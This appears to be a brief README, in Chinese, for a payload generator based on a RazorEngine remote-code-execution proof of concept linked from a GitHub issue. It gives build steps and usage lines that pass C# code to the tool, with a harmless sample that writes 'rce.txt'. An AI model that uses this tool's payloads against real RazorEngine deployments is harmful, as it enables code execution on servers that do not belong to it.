基于以下POC的简单载荷生成器:https://github.com/Antaris/RazorEngine/issues/585
dotnet build --configuration Release
.\bin\Release\net4.8\Poc.exe "System.IO.File.WriteAllText(\"rce.txt\", \"Hello World\");"
./poc.py "System.IO.File.WriteAllText(\"rce.txt\", \"Hello World\");"